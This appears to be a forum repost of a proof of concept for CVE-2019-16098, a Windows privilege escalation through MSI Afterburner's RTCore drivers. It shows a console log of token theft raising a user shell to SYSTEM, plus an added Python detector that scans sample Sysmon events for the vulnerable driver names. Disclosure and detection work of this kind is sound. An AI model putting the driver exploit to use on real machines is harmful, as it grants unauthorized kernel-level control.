Nytro

Local privilege escalation PoC exploit for CVE-2019-16098


CVE-2019-16098

The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code.

For more updates, visit CVE-2019-16098

WARNING: Hardcoded Windows 10 x64 Version 1903 offsets!

Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat

C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM

C:\Users\Barakat\source\repos\CVE-2019-16098>

 

Source: https://github.com/Barakat/CVE-2019-16098
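
A defender-side check for the driver named in the description above, as an added example that is not part of the original post or the linked repository: it scans Sysmon Event ID 6 (driver loaded) records for RTCore64.sys or RTCore32.sys and rates loads from outside Program Files higher. The sample events, the expected install prefixes and the severity labels are assumptions constructed for illustration.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
VULNERABLE_NAMES = {"rtcore64.sys", "rtcore32.sys"}  # names from the CVE text
# Assumption: a normal MSI Afterburner install loads the driver from Program Files.
EXPECTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")

def _event(event_id, time, image):
    """Build one constructed Sysmon-style event (sample data, not real telemetry)."""
    return (f"<Event><System><EventID>{event_id}</EventID></System><EventData>"
            f'<Data Name="UtcTime">{time}</Data>'
            f'<Data Name="ImageLoaded">{image}</Data></EventData></Event>')

SAMPLE_EVENTS = (
    f'<Events xmlns="{NS["e"]}">'
    + _event(6, "2019-09-12 10:01:00.000",
             r"C:\Program Files (x86)\MSI Afterburner\RTCore64.sys")
    + _event(6, "2019-09-12 10:05:00.000", r"C:\Users\Public\rtcore64.SYS")
    + _event(6, "2019-09-12 10:06:00.000", r"C:\Windows\System32\drivers\tcpip.sys")
    + _event(7, "2019-09-12 10:07:00.000", r"C:\Users\Public\RTCore64.sys")
    + "</Events>")

def data(event, name):
    """Return the text of the named <Data> field, or '' if it is absent."""
    for node in event.iterfind("e:EventData/e:Data", NS):
        if node.get("Name") == name:
            return node.text or ""
    return ""

def find_rtcore_loads(xml_text):
    """Return one finding per driver-load event that names a vulnerable driver."""
    findings = []
    for event in ET.fromstring(xml_text).iterfind("e:Event", NS):
        if event.findtext("e:System/e:EventID", "", NS) != "6":
            continue  # only Event ID 6 records a kernel driver load
        image = data(event, "ImageLoaded")
        if ntpath.basename(image).lower() not in VULNERABLE_NAMES:
            continue
        # A copy loaded from outside the install directory was likely staged.
        staged = not image.lower().startswith(EXPECTED_PREFIXES)
        findings.append({"time": data(event, "UtcTime"), "image": image,
                         "severity": "high" if staged else "medium"})
    return findings

if __name__ == "__main__":
    for finding in find_rtcore_loads(SAMPLE_EVENTS):
        print(finding["severity"], finding["time"], finding["image"])
```

Matching on file name misses a renamed copy; the page gives no file hashes, so hash-based matching would need values from another source.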
